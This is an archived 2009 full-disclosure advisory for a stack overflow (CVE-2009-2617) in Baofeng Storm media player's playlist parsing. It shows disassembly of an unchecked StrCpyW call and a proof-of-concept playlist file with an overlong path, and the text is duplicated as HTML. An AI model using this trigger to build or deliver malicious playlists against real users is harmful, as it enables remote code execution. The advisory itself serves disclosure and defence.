Baofeng Media Player playlist stack overflow

Published
Credit
Risk
2009.07.28
Jambalaya
High
CWE
CVE
Local
Remote
CWE-119
CVE-2009-2617
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
9.3/10
10/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete





Baofeng Media Player playlist stack overflow vulnerability

By Jambalaya of Nevis Labs
Date: 2009.06.24


Vender:
Baofeng

Affected:
Storm 3.9.62
*Other version may also be affected

Overview:
Baofeng is a widely popular media player in China, and it plays many common
media file formats. There are almost 120 million customer using baofeng
media player in China.

Details:
The specific flaws exists in medialib.dll. the stack overflow vulnerablility
is due to the way it incorrectly handle smpl file type which is a
playlist.Succssfully exploiting this vulnerability allows attackers to
execute arbitrary code on vulnerable installation.

the vulnerability could be triggered when it pass a long path, and lack
legal examine on the length of path£º

.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
.text:1000567B sub_1000567B proc near ; DATA XREF:
.rdata:100248D4o
.text:1000567B
.text:1000567B FileName = word ptr -628h
.text:1000567B var_10 = dword ptr -10h
.text:1000567B var_C = dword ptr -0Ch
.text:1000567B var_4 = dword ptr -4
.text:1000567B pszUrl = dword ptr 8
.text:1000567B pcchPath = dword ptr 0Ch
.text:1000567B
.text:1000567B mov eax, offset sub_100221F8
.text:10005680 call __EH_prolog
.text:10005685 sub esp, 61Ch
.text:1000568B push ebx
.text:1000568C push esi
.text:1000568D mov esi, [ebp+pszUrl]
.text:10005690 mov [ebp+var_10], ecx
.text:10005693 test esi, esi
.text:10005695 jz loc_1000577D
.text:1000569B mov ebx, [ebp+pcchPath]
.text:1000569E test ebx, ebx
.text:100056A0 jz loc_1000577D
.text:100056A6 push edi
.text:100056A7 push esi ; pszPath
.text:100056A8 xor edi, edi
.text:100056AA mov [ebp+pcchPath], 208h
.text:100056B1 call ds:PathIsURLW
.text:100056B7 test eax, eax
.text:100056B9 jz short loc_100056E0
.text:100056BB push 3 ; UrlIs
.text:100056BD push esi ; pszUrl
.text:100056BE call ds:UrlIsW
.text:100056C4 test eax, eax
.text:100056C6 jz short loc_100056E0
.text:100056E0 loc_100056E0: ; CODE XREF:
sub_1000567B+3Ej
.text:100056E0 ; sub_1000567B+4Bj
.text:100056E0 lea eax, [ebp+FileName]
.text:100056E6 push esi
.text:100056E7 push eax
.text:100056E8 call ds:StrCpyW
<---------------------strcpy directly with out any examiation.

Proof of concept&#163;&#186;
<playlist><item name="2.GIF" source="C:\Documents and
Settings\Linlin\&#192;&#195;&#230;\2.GIF" duration="0"/><item name="0001.gif"
source="C:\Documents and
Settings\Linlin\&#192;&#195;&#230;\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" duration="0"/></playlist>


Greetz to those friends who I have long time no see T_T&#163;&#186;Pratik Dixit, Sanjay
pendse, Winny Thomas, ajit.hatti

Vendor Response:
2009.06.16 Vendor notified via email
2009.06.25 Vendor release new version




<div>Baofeng Media Player playlist stack overflowvulnerability</div><div><br></div><div>By Jambalaya of Nevis Labs</div><div>Date:2009.06.24</div><div><br></div><div><br></div><div>Vender:</div><div>Baofeng</div><div><br> </div><div>Affected:</div><div>Storm 3.9.62</div><div>*Other version may also> be affected</div><div><br></div><div>Overview:</div><div>Baofeng is a widely> popular media player in China, and it plays many common media file formats. There> are almost 120 million customer using baofeng media player in China.</div>
<div><br></div><div>Details:</div><div>The specific flaws exists in medialib.dll. thestack overflow vulnerablility is due to the way it incorrectly handle smpl file typewhich is a playlist.Succssfully exploiting this vulnerability allows attackers toexecute arbitrary code on vulnerable installation.</div> <div><br></div><div>thevulnerability could be triggered when it pass a long path, and lack legal examine onthe length of path&#163;&#186;</div><div><br></div><div>.text:1000567B ; int __stdcallsub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)</div> <div>.text:1000567B sub_1000567B&nbsp; &nbsp;proc near &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ; DATA XREF:.rdata:100248D4 o</div><div>.text:1000567B</div><div>.text:1000567B FileName &nbsp;&nbsp; &nbsp; &nbsp;= word ptr -628h</div><div>.text:1000567B var_10 &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;= dword ptr -10h</div> <div>.text:1000567B var_C &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; = dword ptr -0Ch</div><div>.text:1000567B var_4 &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; = dword ptr -4</div><div>.text:1000567B pszUrl &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;= dword ptr &nbsp;8</div><div>.text:1000567B pcchPath &nbsp;&nbsp; &nbsp; &nbsp;= dword ptr &nbsp;0Ch</div><div>.text:1000567B</div><div>.text:1000567B &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; mov &nbsp; &nbsp; eax, offsetsub_100221F8</div><div>.text:10005680 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; call &nbsp; &nbsp;__EH_prolog</div><div>.text:10005685 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sub &nbsp; &nbsp; esp, 61Ch</div><div>
.text:1000568B &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; push &nbsp;&nbsp;ebx</div><div>.text:1000568C &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; &nbsp;esi</div><div>.text:1000568D &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp; &nbsp; esi,[ebp+pszUrl]</div><div>.text:10005690 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; mov &nbsp; &nbsp; [ebp+var_10], ecx</div> <div>.text:10005693 &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; &nbsp;esi,esi</div><div>.text:10005695 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;jz &nbsp; &nbsp; &nbsp;loc_1000577D</div><div>.text:1000569B &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp; &nbsp; ebx,[ebp+pcchPath]</div><div>.text:1000569E &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; test &nbsp; &nbsp;ebx, ebx</div> <div>.text:100056A0 &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jz &nbsp; &nbsp;&nbsp;loc_1000577D</div><div>.text:100056A6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; push &nbsp; &nbsp;edi</div><div>.text:100056A7 &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; push &nbsp; &nbsp;esi &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; ; pszPath</div><div>.text:100056A8 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; edi, edi</div> <div>.text:100056AA &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp; &nbsp; [ebp+pcchPath],208h</div><div>.text:100056B1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;call &nbsp; &nbsp;ds:PathIsURLW</div><div>.text:100056B7 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; &nbsp;eax, eax</div><div>.text:100056B9&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jz &nbsp; &nbsp; &nbsp;shortloc_100056E0</div> <div>.text:100056BB &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; push &nbsp; &nbsp;3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ;UrlIs</div><div>.text:100056BD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; &nbsp;esi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ;pszUrl</div><div>.text:100056BE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; &nbsp;ds:UrlIsW</div><div>.text:100056C4 &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; &nbsp;eax, eax</div><div>.text:100056C6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jz &nbsp;&nbsp; &nbsp;short loc_100056E0</div><div>.text:100056E0 loc_100056E0: &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ; CODEXREF: sub_1000567B+3E j</div><div>.text:100056E0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; ; sub_1000567B+4B j</div> <div>.text:100056E0 &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; lea &nbsp; &nbsp; eax,[ebp+FileName]</div><div>.text:100056E6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; push &nbsp; &nbsp;esi</div><div>.text:100056E7 &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; push &nbsp; &nbsp;eax</div><div>.text:100056E8&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; call &nbsp; &nbsp;ds:StrCpyW&nbsp; &lt;---------------------strcpy directly with out any examiation.</div><div><br></div><div>Proof of concept&#163;&#186;</div><div>&lt;playlist&gt;&lt;itemname=&quot;2.GIF&quot; source=&quot;C:\Documents and Settings\Linlin\&#192;&#195;&#230;\2.GIF&quot;duration=&quot;0&quot;/&gt;&lt;item name=&quot;0001.gif&quot;source=&quot;C:\Documents andSettings\Linlin\&#192;&#195;&#230;\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif&quot;duration=&quot;0&quot;/&gt;&lt;/playlist&gt;</div><div><br></div><div><br></div><div>Greetz to those friends who I have long time nosee T_T&#163;&#186;Pratik Dixit, Sanjay pendse, Winny Thomas,ajit.hatti</div><div><br></div><div>Vendor Response:</div><div>2009.06.16 Vendornotified via email</div> <div>2009.06.25 Vendor release new version</div>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

<b>[prev in list] [next in list] [<font color="#c0c0c0">prev in thread</font>] [next in thread] </b>
</pre>
</pre><br><center>
Configure |

About |
News |
Donate |
Addalist |
Sponsors:10East,KoreLogic,Terra-International,Chakpak.com
</center>
</body>
</html>

References:

http://www.securityfocus.com/bid/35512
http://secunia.com/advisories/35592
http://marc.info/?l=full-disclosure&m=124627617220913&w=2
http://marc.info/?l=full-disclosure&m=124624413120440&w=2


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com